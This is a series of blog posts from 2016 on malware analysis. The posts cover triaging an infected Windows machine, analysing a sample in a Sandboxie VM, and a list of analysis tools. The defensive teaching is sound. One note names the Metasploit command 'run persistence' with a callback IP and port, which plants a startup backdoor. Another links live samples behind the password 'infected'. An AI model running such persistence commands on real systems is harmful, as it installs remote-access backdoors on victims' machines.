Thursday, 28 January 2016

Just another Malware Analysis Guide (2) - Bigger Picture

On part 1, just simple check and remove the malware. Part 2 will perform further analysis on the malware. For those who interested in malware analysis can refer to Practical Malware Analysis and Malware Analyst's Cookbook

Tools that will be used on this part 2:
VMware Player/ VMware Workstation
Oracle VirtualBox
Windows 7 32/64 bits ISO
Buster Sandbox Analyzer 1.88
Sandboxie 3.70

The following sandbox testing was running on Sandboxie 3.70 with Buster Sandbox Analyzer 1.88

===Environment Setup===
The following environment setup used VMware Workstation and Windows 7 Ultimate 64 bits SP1.
Create a new virtual machine

Select your Windows 7 iso

Configure your machine performance

After that just click Finish, then it will automatically power on the machine if you enable "Power on this virtual machine after  creation"

After finished install Windows, it will auto install vmware-tool and then restart.

# Install Wireshark
Just click Next it finish installed.

# Extract Buster Sandbox Analyzer (BSA)


# Install and configure Sandboxie

Configure Sandboxie.

Add the following to your configuration file and save.
InjectDll=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API32.dll
InjectDll64=C:\Users\exploit\Downloads\bsa\LOG_API\LOG_API64.dll
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
* Note: Select your buster sandbox analyzer path.

On your BSA, select your Sandbox location:

# Extract sysinternals suite into a folder
Start > Right Click Computer > Properties > Advanced system settings > Advanced tab > Environment Variables > Path > Copy the Sysinternals path > Ok > Ok > Ok


Open CMD and type tcpview/ autoruns/ procexp/ procmon will prompt an agreement box, just click Accept:

Go to your Sysinternals Suite folder, locate procexp, Right Click > Properties > Compatibility tab > Enable Run as Administrator:

Right click Select Columns > Enable DEP, ASLR, Verify Sign, Network Sends and Receives.
Network Sends and Receives require Administrator only can view.

You can see which process is using network.

# Install CFF Explorer

The above shows the library imported by calc.exe.

# Extract and run PeStudio

Let's take a snapshot on the virtual machine before we proceed.
On your VMware Workstation, VM Tab > Snapshot > Take Snapshot

===Analyze the malware===
Base on Part 1, if you have malware sample, simply drag and drop or copy and paste into your virtual machine. After the malware inside the machine, run it.

Open your Process Explorer and check any suspicious process is using network connection.
Double click on the suspicious process to view more information about the running program.

Base on the malicious file location, drag and drop the malware into PeStudio.


wsock32.dll and ws2_32.dll library are used for launching network connection. 

Drag and drop the malware into CFF Explorer.


Drag and drop the malware into PEiD.

PEiD shows there are base64 encoded in the program.

Open you Sandboxie and Buster Sandbox Analyzer, click Start Analysis on your BSA. 
It may prompt "Delete Sandbox Folder contents and continue" and "Ignore Sandbox Folder contents and continue". You can select Ignore Sandbox Folder contents and continue.
After click Start Analysis, it will wait for any file execute in Sandboxie.

Let's drop the malicious file into Sandboxie, and choose Defaultbox.

The result analysis from BSA:

You will notice a connection to IP address 192.168.0.128 with port 4433.
wsock32.dll, ws2_32.dll and wshtcpip.dll were used for perform network connection.

Notice the location of the malicious file is at Temp folder. Do you feels weird how it execute by itself? Let's recall back Part 1, you can use wmic command to extract all startup program.

CMD :/> wmic startup list full > startup.txt


Suspicious visual basic script (vbs) on registered on startup.

Open the vbs in text editor, the source code has been obfuscated with random characters but that's ok. We can briefly understand what is the script trying to do.
It used Wscript.Shell to execute the malicious EXE file.

Spot the wsscript process in the Process Explorer:

Terminate the process by Right click > Kill Process Tree. OR you can press Shift+Delete key on your keyboard.

After stopped or killed the process, we are good to remove or delete the registry key and the executable file. Refer to Part 1 on how to remove the registry key and the value.


* Note: If you are familiar with Metasploit, you will notice the EXE and VBS are generated by Metasploit Meterpreter command run persistence -U -i 5 -p 4433 -r 192.168.0.128
Sample file: EXE VBS
Password: infected

End of Just another Malware Analysis Guide (2) - Bigger Picture

Tuesday, 26 January 2016

Just another Malware Analysis Guide (1) - Simple and easy

Just a simple way to check if your machine was infected by malware.

===Information gathering===
1. Run command prompt as Administrator. Start > Type "cmd" > Right-click "Run as Administrator".



Change directory to your preferences:
C:\Windows\system32> cd c:\User\<User>\Desktop
- cd: Change directory

C:\Users\user\Desktop> mkdir suspect
- mkdir: Make directory (folder)

2. Some WMIC commands trick:
# Obtain all the running processes and output to a file
C:\Users\user\Desktop\suspect> wmic process list full > process.txt

# Obtain all the registered services and output to a file
C:\Users\user\Desktop\suspect> wmic service list full > service.txt

# Obtain all the startup program and output to a file
C:\Users\user\Desktop\suspect> wmic startup list full > startup.txt

3. Collect network information:
# Obtain DNS cache and output to file
C:\Users\user\Desktop\suspect> ipconfig /displaydns > dnscache.txt

# Obtain live current connection
C:\Users\user\Desktop\suspect> netstat -abno > netstats.txt
- a: Displays all connections and listening ports.
- b: Displays the executable involved in creating each connection or listening port.
- n: Displays addresses and port numbers in numerical form.
- p: Displays the owning process ID associated with each connection.


Sample triage script to collect information. *Note: You are require to Run as Administrator
If you execute or run the file, you should see three new files as below:



===Analysis gathered information===
1. Analyze any weird/ abnormal DNS from your dnscache file. Image below showed example for chrome:
* Note: You may verify the domain/ IP address at VirusTotal

2. Check the suspected domain/ IP addresses in netstats file. Example as below:

3. Obtain the Process ID from netstats and obtain the executable file location.


4. Go to the malicious process file location. Calculate the hash using HashMyFile and submit to VirusTotal for validation. You may upload the file to VirusTotal or submit to dedicated AntiVirus if it does not contain sensitive information.
*Note: It can be clean due to no sample was analyzed by AntiVirus*

Example of using HashMyFile


5. If you confirm it is malware, terminate the process and delete it.
Terminate through Task Manager:

Terminate through Command Prompt:
C:\Users\user\Desktop> taskkill /pid <malicious process ID>
The process ID is 520.

6. Remove the malware artifact from registry key and service:
Check the extracted startup program file. Look for suspicious program.
Example:


#Delete the registry key.
C:\Users\user\Desktop> reg delete <malicious reg key full path> /v <value name>



#Stop and delete the service.
C:\Users\user\Desktop> sc stop <malicious service name>
C:\Users\user\Desktop> sc delete <malicious service name>

7. Restart your PC and run everything again to check does the malware has been removed.

End of Just another Malware Analysis Guide (1) - Simple and easy

Monday, 25 January 2016

Malware Analysis Tools

Malware Analysis Tools

It is not a complete list but enough to perform malware analysis.

Linux command in Windows
Cygwin

File Analysis
PeExplorer
PeStudio
PEiD
CFF Explorer
OfficeMalScanner
PDF Tools
PDF Stream Dumper

Hash Calculator
HashMyFiles

Hex Editor
Hexinator
WinHex

System Analysis
Sysinternals Suite
CaptureBAT
RegShot

Network Analysis
Mandiant ApateDNS
Wireshark

Memory Forensics
DumpIt
FTK Imager Lite
Volatility
Memoryze

Disassembly and Debugger
IDA PRO
Olly Debugger
Immunity Debugger
Windows Debugger
x64 Debugger
Hopper
BinNavi
Radare2

Rebuild Import Table
Scylla

Malware Analysis Framework/ Toolkit
Viper Framework
REMnux

Sandbox
Cuckoo
Buster Sandbox Analyzer
Sandboxie

IDA Plugins
IDA Plugin Lists
IDAYara

Write your own rule
Yara

Automate validation
TargetAnalyser

Scripting
Python

More plugins and tools can be found on OpenRCE
IP/ URL Blacklist can be found on here.
For complete malware analysis tools and sources Here!